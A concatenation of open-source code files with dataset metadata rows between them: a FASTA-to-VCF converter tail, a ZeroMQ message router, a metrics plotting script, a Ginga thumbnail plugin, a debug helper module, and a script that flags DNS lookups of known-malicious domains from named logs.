##INFO=<ID=MAC,Number=1,Type=Integer,Description="Minor allele count">
##INFO=<ID=MAF,Number=1,Type=Float,Description="Minor allele frequency">
##INFO=<ID=NS,Number=1,Type=Integer,Description="Number of samples with data">
##INFO=<ID=SNP,Number=0,Type=Flag,Description="Variant is a SNP">
##INFO=<ID=INDEL,Number=0,Type=Flag,Description="Variant is an INDEL">
#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO""".format(filedate=today)
print(vcf_header)
# Sort the SNPs and indels by their offset and print the records
srt_variants = sorted(snp_var + ind_var, key=lambda x: x[0])
for v in srt_variants:
# Set the chromosome and position: add 1 to account for 1-based nature
# of VCF
v_chr = refseq
v_pos = str(int(offset) + v[0] + 1)
v_id = '.'
v_qual = '40'
v_filter = '.'
# This is a bit of a hack, but if we have more than three fields, then
# the variant type is a SNP
if len(v) > 3:
# We also have to replace gap characters with N for the reference
# allele in the cases where a SNP occurs in a gapped part of the
# reference.
v_ref = v[1].replace('-', 'N')
# A bit ugly, but we have to cast the alt alleles from set to list
v_alt = ','.join(list(v[2]))
v_info = ';'.join([
'MAC=' + str(v[4]),
'MAF=' + str(v[5]),
'NS=' + str(v[3]),
'SNP'])
else:
# Replace the gap characters with N
v_ref = v[1].replace('-', 'N')
v_alt = v[2].replace('-', 'N')
v_info = 'INDEL'
# Print the line
print('\t'.join([
v_chr,
v_pos,
v_id,
v_ref,
v_alt,
v_qual,
v_filter,
v_info]))
return
def main(fasta):
"""Main function."""
# Store the alignment object as a list
aln = list(SeqIO.parse(fasta, 'fasta'))
# Extract the chromosome name and start position from the name of the
# reference sequence.
chrom, start = extract_ref_coords(aln)
# We should check the reference sequence, too. If there are end-gaps on the
# reference sequence, then we can't accurately calculate positions in the
# alignment.
check_ref_gaps(aln)
# Also check for aligned positions that are all N or all gaps
check_columns(aln)
snps, indels = extract_variants(aln)
# Next, we want to collapse indels. We can find these by identifying runs
# of consecutive integers in the list of indels. Some of the variants that
# are in the list of indels are SNPs that occur within sequences that are
# also part of a length polymorphism. We can just treat them as indels for
# this routine.
c_indels = collapse_indels(indels)
# We also have to adjust the indels: the VCF spec requires that the
# position of the indel be the base *before* the length polymorphism
a_indels = adjust_indels(c_indels, aln)
# Then, print the VCF!
print_vcf(snps, a_indels, chrom, start)
return
main(fa_in)
| unlicense | 4,340,344,280,166,844,000 | 39.180212 | 87 | 0.619207 | false | 3.588198 | false | false | false |
MrYsLab/xideco | xideco/xideco_router/xirt.py | 1 | 5222 | #!/usr/bin/env python3
"""
Created on January 9 11:39:15 2016
@author: Alan Yorinks
Copyright (c) 2016 Alan Yorinks All right reserved.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public
License as published by the Free Software Foundation; either
version 3 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import os
import signal
import socket
import sys
import time
import zmq
from xideco.data_files.port_map import port_map
# noinspection PyUnresolvedReferences,PyUnresolvedReferences,PyUnresolvedReferences,PyUnresolvedReferences,PyUnresolvedReferences
class XidecoRouter:
"""
This class consists of a PAIR connection to a control program bridge (i.e. - HTTP for Scratch),
creates a publisher for Scratch commands, and creates a set of subscribers to listen
for board data changes.
"""
def __init__(self):
"""
This is the constructor for the XidecoRouter class.
:param: use_port_map: If true, use the ip address in the port map, if false, use discovered ip address
:return: None
"""
# figure out the IP address of the router
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# use the google dns
s.connect(('8.8.8.8', 0))
self.ip_addr = s.getsockname()[0]
# identify the router ip address for the user on the console
print('\nXideco Router - xirt')
print('\n******************************************')
print('Using router IP address = ' + self.ip_addr)
print('******************************************')
# find the path to the data files needed for operation
path = sys.path
self.base_path = None
# get the prefix
prefix = sys.prefix
for p in path:
# make sure the prefix is in the path to avoid false positives
if prefix in p:
# look for the configuration directory
s_path = p + '/xideco/data_files/configuration'
if os.path.isdir(s_path):
# found it, set the base path
self.base_path = p + '/xideco'
break
if not self.base_path:
print('Cannot locate xideco configuration directory.')
sys.exit(0)
print('\nIf using the port map, port_map.py is located at:\n')
print(self.base_path + '/data_files/port_map\n')
print('NOTE: The path to port_map.py may be different')
print('for each Operating System/Computer.')
print('\nSet the router_ip_address entry in port_map.py ')
print('to the address printed above for each ')
print('computer running Xideco, or optionally ')
print('set the address manually for each Xideco module')
print('using the command line options.\n')
self.router = zmq.Context()
# establish router as a ZMQ FORWARDER Device
# subscribe to any message that any entity publishes
self.publish_to_router = self.router.socket(zmq.SUB)
bind_string = 'tcp://' + self.ip_addr + ':' + port_map.port_map[
'publish_to_router_port']
self.publish_to_router.bind(bind_string)
# Don't filter any incoming messages, just pass them through
self.publish_to_router.setsockopt_string(zmq.SUBSCRIBE, '')
# publish these messages
self.subscribe_to_router = self.router.socket(zmq.PUB)
bind_string = 'tcp://' + self.ip_addr + ':' + port_map.port_map[
'subscribe_to_router_port']
self.subscribe_to_router.bind(bind_string)
zmq.device(zmq.FORWARDER, self.publish_to_router, self.subscribe_to_router)
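        # Illustrative sketch (not part of the original module) of how a Xideco
        # peer would attach to this FORWARDER device -- peers connect() rather
        # than bind():
        #   pub = zmq.Context().socket(zmq.PUB)
        #   pub.connect('tcp://<router_ip>:' + port_map.port_map['publish_to_router_port'])
        #   sub = zmq.Context().socket(zmq.SUB)
        #   sub.connect('tcp://<router_ip>:' + port_map.port_map['subscribe_to_router_port'])
        #   sub.setsockopt_string(zmq.SUBSCRIBE, '')
        # Every message published to the first port is relayed to all
        # subscribers on the second.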
# noinspection PyMethodMayBeStatic
def route(self):
"""
This method runs in a forever loop.
:return:
"""
while True:
try:
time.sleep(.001)
except KeyboardInterrupt:
sys.exit(0)
def clean_up(self):
self.publish_to_router.close()
self.subscribe_to_router.close()
self.router.term()
def xideco_router():
# noinspection PyShadowingNames
xideco_router = XidecoRouter()
xideco_router.route()
# signal handler function called when Control-C occurs
# noinspection PyShadowingNames,PyUnusedLocal,PyUnusedLocal
def signal_handler(signal, frame):
print('Control-C detected. See you soon.')
xideco_router.clean_up()
sys.exit(0)
# listen for SIGINT
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# Instantiate the router and start the route loop
if __name__ == '__main__':
xideco_router()
| gpl-3.0 | 2,343,351,559,959,859,700 | 32.909091 | 129 | 0.634048 | false | 4.054348 | false | false | false |
project-asap/IReS-Platform | asap-tools/experiments/depricated/handler/metrics.py | 1 | 1434 | __author__ = 'cmantas'
from tools import *
from json import loads
ms = take_single("select metrics from mahout_kmeans_text where k=15 and documents=90300 and dimensions=53235;")[0]
mj = loads(ms)
cols = iter(["#727272", '#f1595f', '#79c36a', '#599ad3', '#f9a65a','#9e66ab','#cd7058', '#d77fb3'])
def timeline2vaslues(fieldname, metrics):
times =[]
values =[]
for k,v in metrics:
times.append(k)
values.append(v[fieldname])
return times, values
def sum_timeline_vals(fieldnames, metrics):
times =[]
values =[]
for k,v in metrics:
times.append(k)
sum = 0
for i in fieldnames:
if i.startswith("kbps"):
v[i]=int(v[i])
sum += v[i]
values.append(sum)
return times, values
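# Illustrative example (hypothetical metrics list): for
#   metrics = [(0, {'cpu': 10, 'mem': 40}), (5, {'cpu': 20, 'mem': 42})]
# timeline2vaslues('cpu', metrics) returns ([0, 5], [10, 20]) and
# sum_timeline_vals(['cpu', 'mem'], metrics) returns ([0, 5], [50, 62]).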
# figure()
fig, ax1 = plt.subplots()
times, values = timeline2vaslues("cpu", mj)
d, = ax1.plot(times, values, color=next(cols))
ax1.set_ylabel('percentage (%)')
times, values = timeline2vaslues("mem", mj)
a, = ax1.plot(times, values, color=next(cols))
ax2 = ax1.twinx()
times, values = sum_timeline_vals(["kbps_read", "kbps_write"], mj)
ax2.set_ylabel("KB/s")
b, = ax2.plot(times, values, color=next(cols))
times, values = sum_timeline_vals(["net_in", "net_out"], mj)
c, = ax2.plot(times, values, color=next(cols))
plt.title("Mahout K-means Cluster Metrics")
plt.legend([d, a, b,c], ["CPU", "MEM", "Disk IO", "Net IO"], loc=3)
show() | apache-2.0 | -2,237,060,242,500,615,200 | 25.090909 | 115 | 0.616457 | false | 2.822835 | false | false | false |
astrofrog/ginga | ginga/gtkw/plugins/Thumbs.py | 1 | 16891 | #
# Thumbs.py -- Thumbnail plugin for fits viewer
#
# Eric Jeschke ([email protected])
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from ginga.gtkw import FitsImageGtk as FitsImageGtk
from ginga import GingaPlugin
import os
import time
import hashlib
import gtk
import gobject
from ginga.misc import Bunch
class Thumbs(GingaPlugin.GlobalPlugin):
def __init__(self, fv):
# superclass defines some variables for us, like logger
super(Thumbs, self).__init__(fv)
# For thumbnail pane
self.thumbDict = {}
self.thumbList = []
self.thumbRowList = []
self.thumbNumRows = 20
self.thumbNumCols = 1
self.thumbColCount = 0
# distance in pixels between thumbs
self.thumbSep = 15
# max length of thumb on the long side
self.thumbWidth = 150
prefs = self.fv.get_preferences()
self.settings = prefs.createCategory('plugin_Thumbs')
self.settings.load()
self.thmbtask = None
self.lagtime = 4000
self.keywords = ['OBJECT', 'FRAMEID', 'UT', 'DATE-OBS']
fv.set_callback('add-image', self.add_image)
fv.set_callback('add-channel', self.add_channel)
fv.set_callback('delete-channel', self.delete_channel)
fv.add_callback('active-image', self.focus_cb)
def build_gui(self, container):
width, height = 300, 300
cm, im = self.fv.cm, self.fv.im
tg = FitsImageGtk.FitsImageGtk(logger=self.logger)
tg.configure(200, 200)
tg.enable_autozoom('on')
tg.enable_autocuts('on')
tg.enable_auto_orient(True)
tg.set_makebg(False)
self.thumb_generator = tg
sw = gtk.ScrolledWindow()
sw.set_border_width(2)
sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
# Create thumbnails pane
vbox = gtk.VBox(spacing=14)
vbox.set_border_width(4)
self.w.thumbs = vbox
sw.add_with_viewport(vbox)
sw.show_all()
self.w.thumbs_scroll = sw
self.w.thumbs_scroll.connect("size_allocate", self.thumbpane_resized)
#nb.connect("size_allocate", self.thumbpane_resized)
# TODO: should this even have it's own scrolled window?
container.pack_start(sw, fill=True, expand=True)
def add_image(self, viewer, chname, image):
noname = 'Noname' + str(time.time())
name = image.get('name', noname)
path = image.get('path', None)
if path != None:
path = os.path.abspath(path)
thumbname = name
if '.' in thumbname:
thumbname = thumbname.split('.')[0]
self.logger.debug("making thumb for %s" % (thumbname))
# Is there a preference set to avoid making thumbnails?
chinfo = self.fv.get_channelInfo(chname)
prefs = chinfo.prefs
if not prefs.get('genthumb', False):
return
# Is this thumbnail already in the list?
# NOTE: does not handle two separate images with the same name
# in the same channel
thumbkey = (chname.lower(), path)
if self.thumbDict.has_key(thumbkey):
return
#data = image.get_data()
# Get metadata for mouse-over tooltip
header = image.get_header()
metadata = {}
for kwd in self.keywords:
metadata[kwd] = header.get(kwd, 'N/A')
#self.thumb_generator.set_data(data)
self.thumb_generator.set_image(image)
self.copy_attrs(chinfo.fitsimage)
imgwin = self.thumb_generator.get_image_as_widget()
imgwin.set_property("has-tooltip", True)
imgwin.connect("query-tooltip", self._mktt(thumbkey, name, metadata))
self.insert_thumbnail(imgwin, thumbkey, thumbname, chname, name, path)
def _mktt(self, thumbkey, name, metadata):
return lambda tw, x, y, kbmode, ttw: self.query_thumb(thumbkey, name, metadata, x, y, ttw)
def insert_thumbnail(self, imgwin, thumbkey, thumbname, chname, name, path):
vbox = gtk.VBox(spacing=0)
vbox.pack_start(gtk.Label(thumbname), expand=False,
fill=False, padding=0)
evbox = gtk.EventBox()
evbox.add(imgwin)
evbox.connect("button-press-event",
lambda w, e: self.fv.switch_name(chname, name,
path=path))
vbox.pack_start(evbox, expand=False, fill=False)
vbox.show_all()
bnch = Bunch.Bunch(widget=vbox, evbox=evbox)
if self.thumbColCount == 0:
hbox = gtk.HBox(homogeneous=True, spacing=self.thumbSep)
self.w.thumbs.pack_start(hbox)
self.thumbRowList.append(hbox)
else:
hbox = self.thumbRowList[-1]
hbox.pack_start(bnch.widget)
self.thumbColCount = (self.thumbColCount + 1) % self.thumbNumCols
self.w.thumbs.show_all()
self.thumbDict[thumbkey] = bnch
self.thumbList.append(thumbkey)
# force scroll to bottom of thumbs
# adj_w = self.w.thumbs_scroll.get_vadjustment()
# max = adj_w.get_upper()
# adj_w.set_value(max)
self.logger.debug("added thumb for %s" % (thumbname))
def reorder_thumbs(self):
# Remove old rows
for hbox in self.thumbRowList:
children = hbox.get_children()
for child in children:
hbox.remove(child)
self.w.thumbs.remove(hbox)
# Add thumbs back in by rows
self.thumbRowList = []
colCount = 0
hbox = None
for thumbkey in self.thumbList:
self.logger.debug("adding thumb for %s" % (str(thumbkey)))
chname, name = thumbkey
bnch = self.thumbDict[thumbkey]
if colCount == 0:
hbox = gtk.HBox(homogeneous=True, spacing=self.thumbSep)
hbox.show()
self.w.thumbs.pack_start(hbox)
self.thumbRowList.append(hbox)
hbox.pack_start(bnch.widget)
hbox.show_all()
colCount = (colCount + 1) % self.thumbNumCols
self.thumbColCount = colCount
self.w.thumbs.show_all()
def update_thumbs(self, nameList):
# Remove old thumbs that are not in the dataset
invalid = set(self.thumbList) - set(nameList)
if len(invalid) > 0:
for thumbkey in invalid:
self.thumbList.remove(thumbkey)
del self.thumbDict[thumbkey]
self.reorder_thumbs()
def thumbpane_resized(self, widget, allocation):
x, y, width, height = self.w.thumbs_scroll.get_allocation()
self.logger.debug("reordering thumbs width=%d" % (width))
cols = max(1, width // (self.thumbWidth + self.thumbSep))
if self.thumbNumCols == cols:
# If we have not actually changed the possible number of columns
# then don't do anything
return False
self.logger.debug("column count is now %d" % (cols))
self.thumbNumCols = cols
self.reorder_thumbs()
return False
def query_thumb(self, thumbkey, name, metadata, x, y, ttw):
objtext = 'Object: UNKNOWN'
try:
objtext = 'Object: ' + metadata['OBJECT']
except Exception, e:
self.logger.error("Couldn't determine OBJECT name: %s" % str(e))
uttext = 'UT: UNKNOWN'
try:
uttext = 'UT: ' + metadata['UT']
except Exception, e:
self.logger.error("Couldn't determine UT: %s" % str(e))
chname, path = thumbkey
s = "%s\n%s\n%s\n%s" % (chname, name, objtext, uttext)
ttw.set_text(s)
return True
def clear(self):
self.thumbList = []
self.thumbDict = {}
self.reorder_thumbs()
def add_channel(self, viewer, chinfo):
"""Called when a channel is added from the main interface.
Parameter is chinfo (a bunch)."""
fitsimage = chinfo.fitsimage
fitsimage.add_callback('cut-set', self.cutset_cb)
fitsimage.add_callback('transform', self.transform_cb)
rgbmap = fitsimage.get_rgbmap()
rgbmap.add_callback('changed', self.rgbmap_cb, fitsimage)
def focus_cb(self, viewer, fitsimage):
# Reflect transforms, colormap, etc.
#self.copy_attrs(fitsimage)
self.redo_delay(fitsimage)
def transform_cb(self, fitsimage):
self.redo_delay(fitsimage)
return True
def cutset_cb(self, fitsimage, loval, hival):
self.redo_delay(fitsimage)
return True
def rgbmap_cb(self, rgbmap, fitsimage):
# color mapping has changed in some way
self.redo_delay(fitsimage)
return True
def copy_attrs(self, fitsimage):
# Reflect transforms, colormap, etc.
fitsimage.copy_attributes(self.thumb_generator,
['transforms', 'cutlevels',
'rgbmap'],
redraw=False)
def redo_delay(self, fitsimage):
# Delay regeneration of thumbnail until most changes have propagated
if self.thmbtask != None:
gobject.source_remove(self.thmbtask)
self.thmbtask = gobject.timeout_add(self.lagtime, self.redo_thumbnail,
fitsimage)
return True
def redo_thumbnail(self, fitsimage, save_thumb=None):
self.logger.debug("redoing thumbnail...")
# Get the thumbnail image
image = fitsimage.get_image()
if image == None:
return
if save_thumb == None:
save_thumb = self.settings.get('cacheThumbs', False)
chname = self.fv.get_channelName(fitsimage)
# Get metadata for mouse-over tooltip
header = image.get_header()
metadata = {}
for kwd in self.keywords:
metadata[kwd] = header.get(kwd, 'N/A')
# Look up our version of the thumb
name = image.get('name', None)
path = image.get('path', None)
if path == None:
return
path = os.path.abspath(path)
try:
thumbkey = (chname, path)
bnch = self.thumbDict[thumbkey]
except KeyError:
return
# Generate new thumbnail
# TODO: Can't use set_image() because we will override the saved
# cuts settings...should look into fixing this...
## timage = self.thumb_generator.get_image()
## if timage != image:
## self.thumb_generator.set_image(image)
#data = image.get_data()
#self.thumb_generator.set_data(data)
self.thumb_generator.set_image(image)
fitsimage.copy_attributes(self.thumb_generator,
['transforms', 'cutlevels',
'rgbmap'],
redraw=False)
# Save a thumbnail for future browsing
if save_thumb:
thumbpath = self.get_thumbpath(path)
if thumbpath != None:
self.thumb_generator.save_image_as_file(thumbpath,
format='jpeg')
imgwin = self.thumb_generator.get_image_as_widget()
imgwin.set_property("has-tooltip", True)
imgwin.connect("query-tooltip", self._mktt(thumbkey, name, metadata))
# Replace thumbnail image widget
child = bnch.evbox.get_child()
bnch.evbox.remove(child)
bnch.evbox.add(imgwin)
def delete_channel(self, viewer, chinfo):
"""Called when a channel is deleted from the main interface.
Parameter is chinfo (a bunch)."""
chname_del = chinfo.name.lower()
# TODO: delete thumbs for this channel!
self.logger.info("deleting thumbs for channel '%s'" % (
chname_del))
newThumbList = []
for thumbkey in self.thumbList:
chname, path = thumbkey
if chname != chname_del:
newThumbList.append(thumbkey)
else:
del self.thumbDict[thumbkey]
self.thumbList = newThumbList
self.reorder_thumbs()
def _make_thumb(self, chname, image, path, thumbkey,
save_thumb=False, thumbpath=None):
# This is called by the make_thumbs() as a gui thread
self.thumb_generator.set_image(image)
# Save a thumbnail for future browsing
if save_thumb and (thumbpath != None):
self.thumb_generator.save_image_as_file(thumbpath,
format='jpeg')
imgwin = self.thumb_generator.get_image_as_widget()
# Get metadata for mouse-over tooltip
image = self.thumb_generator.get_image()
header = image.get_header()
metadata = {}
for kwd in self.keywords:
metadata[kwd] = header.get(kwd, 'N/A')
dirname, name = os.path.split(path)
imgwin.set_property("has-tooltip", True)
imgwin.connect("query-tooltip", self._mktt(thumbkey, name, metadata))
thumbname = name
if '.' in thumbname:
thumbname = thumbname.split('.')[0]
self.insert_thumbnail(imgwin, thumbkey, thumbname,
chname, name, path)
self.fv.update_pending(timeout=0.001)
def make_thumbs(self, chname, filelist):
# This is called by the FBrowser plugin, as a non-gui thread!
lcname = chname.lower()
cacheThumbs = self.settings.get('cacheThumbs', False)
for path in filelist:
self.logger.info("generating thumb for %s..." % (
path))
# Do we already have this thumb loaded?
path = os.path.abspath(path)
thumbkey = (lcname, path)
if self.thumbDict.has_key(thumbkey):
continue
# Is there a cached thumbnail image on disk we can use?
save_thumb = cacheThumbs
image = None
thumbpath = self.get_thumbpath(path)
if (thumbpath != None) and os.path.exists(thumbpath):
save_thumb = False
try:
image = self.fv.load_image(thumbpath)
except Exception, e:
pass
try:
if image == None:
image = self.fv.load_image(path)
self.fv.gui_do(self._make_thumb, chname, image, path,
thumbkey, save_thumb=save_thumb,
thumbpath=thumbpath)
except Exception, e:
self.logger.error("Error generating thumbnail for '%s': %s" % (
path, str(e)))
continue
# TODO: generate "broken thumb"?
def _gethex(self, s):
return hashlib.sha1(s).hexdigest()
def get_thumbpath(self, path, makedir=True):
path = os.path.abspath(path)
dirpath, filename = os.path.split(path)
# Get thumb directory
cacheLocation = self.settings.get('cacheLocation', 'local')
if cacheLocation == 'ginga':
# thumbs in .ginga cache
prefs = self.fv.get_preferences()
thumbDir = os.path.join(prefs.get_baseFolder(), 'thumbs')
thumbdir = os.path.join(thumbDir, self._gethex(dirpath))
else:
# thumbs in .thumbs subdirectory of image folder
thumbdir = os.path.join(dirpath, '.thumbs')
if not os.path.exists(thumbdir):
if not makedir:
self.logger.error("Thumb directory does not exist: %s" % (
thumbdir))
return None
try:
os.mkdir(thumbdir)
# Write meta file
metafile = os.path.join(thumbdir, "meta")
with open(metafile, 'w') as out_f:
out_f.write("srcdir: %s\n" % (dirpath))
except OSError, e:
self.logger.error("Could not make thumb directory '%s': %s" % (
thumbdir, str(e)))
return None
# Get location of thumb
modtime = os.stat(path).st_mtime
thumbkey = self._gethex("%s.%s" % (filename, modtime))
thumbpath = os.path.join(thumbdir, thumbkey + ".jpg")
self.logger.debug("thumb path is '%s'" % (thumbpath))
return thumbpath
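        # Illustrative example (hypothetical path): for /data/m31.fits last
        # modified at mtime 1423456789.0 with cacheLocation 'ginga', the thumb is
        # <ginga base folder>/thumbs/<sha1 of '/data'>/<sha1 of 'm31.fits.1423456789.0'>.jpg;
        # with cacheLocation 'local' it goes to /data/.thumbs/<same key>.jpg instead.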
def __str__(self):
return 'thumbs'
#END
| bsd-3-clause | 6,413,837,330,964,040,000 | 34.116424 | 98 | 0.558759 | false | 3.881204 | false | false | false |
mbudde/mail-indicator | MailIndicator/Debug.py | 1 | 1851 | #
# Copyright (C) 2009 Michael Budde <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import inspect
from functools import wraps
"""Is debugging enabled?"""
DEBUGGING = False
def debug(str):
global DEBUGGING
if not DEBUGGING: return
s = inspect.stack()[1]
print '{file}:{line}:{func}: {msg}'.format(
file=os.path.basename(s[1]),
line=s[2],
func=s[3],
msg=str)
def debugfun(fun):
global DEBUGGING
if not DEBUGGING: return fun
@wraps(fun)
def wrapper(*args, **kwargs):
res = fun(*args, **kwargs)
print('{0} ( {1} {2} ) -> {3}'.format(fun.__name__, args, kwargs, res))
return res
return wrapper
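# Illustrative usage (hypothetical function) with DEBUGGING enabled:
#   @debugfun
#   def add(a, b):
#       return a + b
#   add(1, 2)   # prints: add ( (1, 2) {} ) -> 3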
def debugmethod(fun):
@wraps(fun)
def wrapper(klass, *args, **kwargs):
info = {
'file': os.path.basename(inspect.stack()[1][1])[:-3],
'cls': klass.__class__.__name__,
'fun': fun.__name__,
'args': args,
'kwargs': kwargs
}
print('{file}.{cls}.{fun} <-- {args} {kwargs}'.format(**info))
info.update({'res': fun(klass, *args, **kwargs)})
print('{file}.{cls}.{fun} --> {res}'.format(**info))
return info['res']
return wrapper
| gpl-3.0 | -896,696,041,231,857,900 | 30.913793 | 79 | 0.612642 | false | 3.687251 | false | false | false |
madirish/hector | app/scripts/named/named-malware.py | 1 | 10691 | import gzip
from datetime import datetime
import struct, socket
import logging
import os,sys
import MySQLdb
import glob
import yaml
from sys import exc_info
appPath = os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + "/../../")
sys.path.append(appPath + "/lib/pylib")
from pull_config import Configurator
configr = Configurator()
# Credentials used for the database connection
configr = Configurator()
DB = configr.get_var('db')
HOST = configr.get_var('db_host')
USERNAME = configr.get_var('db_user')
PASSWORD = configr.get_var('db_pass')
#logging set up
logger = logging.getLogger('named_malware.py')
hdlr = logging.FileHandler(appPath + '/logs/message_log')
error_hdlr = logging.FileHandler(appPath + '/logs/error_log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s')
hdlr.setFormatter(formatter)
error_hdlr.setFormatter(formatter)
error_hdlr.setLevel(logging.ERROR)
logger.addHandler(hdlr)
logger.addHandler(error_hdlr)
logger.setLevel(logging.DEBUG)
logger.debug('args: [\''+('\', \''.join(sys.argv))+'\']')
#config vars
named_dir = configr.get_var('approot')+"app/scripts/named/"
#parse args and read import config
if len(sys.argv)< 2:
logger.error('Config file path required')
exit(1)
try:
import_config=yaml.load(open(sys.argv[1],'r').read())
except:
logger.error('Error loading config file: {0}'.format(sys.argv[1]))
whitelisted_ips = set(import_config['whitelisted_ips'])
src = import_config['named_src']
src_id = -1 #pre database lookup value
chunksize = import_config['chunksize']
archive = import_config['archive']
current_year = datetime.today().year
current_month = datetime.today().month
domains = {}
ips={}
uniq_set = set()
count = 0
conn = None
cursor = None
def connect_db():
global conn,cursor
logger.info("Opening database connection")
conn = MySQLdb.connect(host=HOST,
user=USERNAME,
passwd=PASSWORD,
db=DB)
cursor = conn.cursor()
#Used add the correct year to the date because the logs do not contain the year
def convert_date(d):
dt=datetime.strptime(d,"%b %d %H:%M:%S")
if current_month<12 and dt.month==12:
dt=dt.replace(year=current_year-1)
else:
dt=dt.replace(year=current_year)
return dt.strftime("%Y-%m-%d %H:%M:%S")
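# Illustrative example: named logs omit the year, so a line stamped
# 'Dec 31 23:59:59' that is processed in January 2015 converts to
# '2014-12-31 23:59:59', while 'Jan 05 08:00:00' processed the same month
# becomes '2015-01-05 08:00:00'.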
#Check if the line is a dns resolution
def is_dns_resolution(l):
return len(l)>8 and l[5]=='client' and l[8]=='query:'
#Checks if the record is unique
#Also add the record to the unique set if it is unique
def is_unique(record):
global uniq_set
if record in uniq_set:
return False
uniq_set.add(record)
return True
#Extracts the date from the line
#Calls convert_date and returns the result
def get_date(l):
date = ' '.join(l[:3])
return convert_date(date)
#Get ip and ip numeric from the ip portion of the log line
def get_ip(ip):
#strip off extra data
ip = ip.split('#')[0]
#Check if the numeric value was computed previously
if ip in ips:
ip_numeric=ips[ip]
else:
#Compute numeric value and store for quick lookup
try:
ip_numeric = struct.unpack('>L',socket.inet_aton(ip))[0]
except:
ip_numeric = -1
logger.error('error with ip numeric for record: {0}'.format(str(l)))
raise
ips[ip]=ip_numeric
return ip,ip_numeric
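# Illustrative example: get_ip('192.168.1.10#53211') strips the source port and
# returns ('192.168.1.10', 3232235786), since
# struct.unpack('>L', socket.inet_aton('192.168.1.10'))[0] == 3232235786.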
#Load all malicious domains from database into dictionary object for quick lookup
def load_domains():
global domains
query = "SELECT domain_id, domain_name from domain where domain_is_malicious > 0"
try:
cursor.execute(query)
except AttributeError:
logger.debug('no connection to db. calling connect_db')
connect_db()
cursor.execute(query)
res = cursor.fetchall()
for record in res:
domains[record[1].lower()] = int(record[0])
#Get domain_id for a malicious domain
#Returns -1 if domain is not marked malicious in database
def get_domain_id(domain):
global domains
if len(domains)==0:
load_domains()
domain = domain.lower()
if not domain in domains:
        return -1
domain_id = domains[domain]
return domain_id
#Returns source id for the named source
def get_src_id(src):
global src_id
#If the source id was previously looked up return the locally saved value
if src_id>=0:
return src_id
#Look up the id by source name
query='select named_src_id from named_src where named_src_name=%s'
try:
cursor.execute(query,(src,))
except:
        connect_db()
cursor.execute(query,(src,))
res = cursor.fetchone()
#Source was not in database
#Insert the source and return the new id
if res == None:
query = 'insert into named_src set named_src_name=%s'
cursor.execute(query,(src,))
conn.commit()
src_id = int(cursor.lastrowid)
#Source was in database
#Save id for faster lookup
else:
src_id = int(res[0])
return src_id
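#Parse a single raw log line
#Returns a comma separated record string ready for import, or -1 to skip the line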
def proc_line(line):
#split line on spaces
l = line.split()
#check if the line corresponds to a dns resolution
if is_dns_resolution(l):
#get id for malicious domain
dm_id = get_domain_id(l[9])
#If domain has id keep processing else skip record(return -1)
if dm_id > -1:
#Get ip and ip numeric
ip,ip_numeric = get_ip(l[6])
#If ip in whitelist skip record(return -1) else keep processing
if ip not in whitelisted_ips:
#get date
date = get_date(l)
#get src_id
src_id = get_src_id(src)
#return string formatted for import
return ','.join(str(x) for x in [date,ip,ip_numeric,dm_id,src_id])
#Indicate record will not be included in the import (skip record)
return -1
#read gzipped log file line by line and write to files for archive and import
def proc_file(filepath,archive_filepath,chunk_filepath_template,chunksize):
logger.debug('processing file: {0}'.format(filepath))
logger.debug('chunk size: {0}'.format(chunksize))
count = 0
fnumber = 0
fchunkout=None
chunk =''
#open gzipped log file
fin = gzip.open(filepath,'r')
for l in fin:
res = proc_line(l)
#If proc_line returned a formatted line and the line is unique
if res != -1 and is_unique(res):
#add line to chunk variable and inc counter
chunk+=res+'\n'
count+=1
#When chunk reaches the target chunksize write to files
if count % chunksize == 0:
chunk_filepath = chunk_filepath_template.format(fnumber)
write_data(chunk,archive_filepath,chunk_filepath)
fnumber+=1
chunk = ''
#If there is a partial chunk at the end write it to files
if chunk!='':
chunk_filepath = chunk_filepath_template.format(fnumber)
write_data(chunk,archive_filepath,chunk_filepath)
fnumber+=1
fin.close()
logger.info('{0} records written to {1} chunk files'.format(count,fnumber))
return fnumber
#writes chunks to archive(gzipped) file and chunk file
def write_data(data, archive_filepath, chunk_filepath):
if archive:
logger.debug('writing to archive file: {0}'.format(archive_filepath))
archivefile = gzip.open(archive_filepath,'a')
archivefile.write(data)
archivefile.close()
logger.debug('writing to chunk file: {0}'.format(chunk_filepath))
with open(chunk_filepath,'w') as chunkfile:
chunkfile.write(data)
#Import chunk files into database one file at a time
#chunks is a list of numbers corresponding to a chunkfile
#chunk_filepath_template is a string that will produce the
#full file path of the chunk file when given the chunk number
def import_chunks(chunks,chunk_filepath_template):
query = "load data local infile %s into table named_resolution fields terminated by ',' lines terminated by '\n' " + \
"(named_resolution_datetime,named_resolution_src_ip,named_resolution_src_ip_numeric,domain_id, named_src_id)"
for i in chunks:
logger.info('importing chunk: {0:03d}'.format(i))
try:
cursor.execute(query,(chunk_filepath_template.format(i),))
conn.commit()
except AttributeError:
logger.debug('no connection to db. calling connect_db')
connect_db()
cursor.execute(query,(chunk_filepath_template.format(i),))
conn.commit()
except:
logger.error('import chunks error', exc_info=True)
raise
logger.info('importing chunk complete.')
#Deletes chunk files
#chunks is a list of numbers corresponding to a chunkfile
#chunk_filepath_template is a string that will produce the
#full file path of the chunk file when given the chunk number
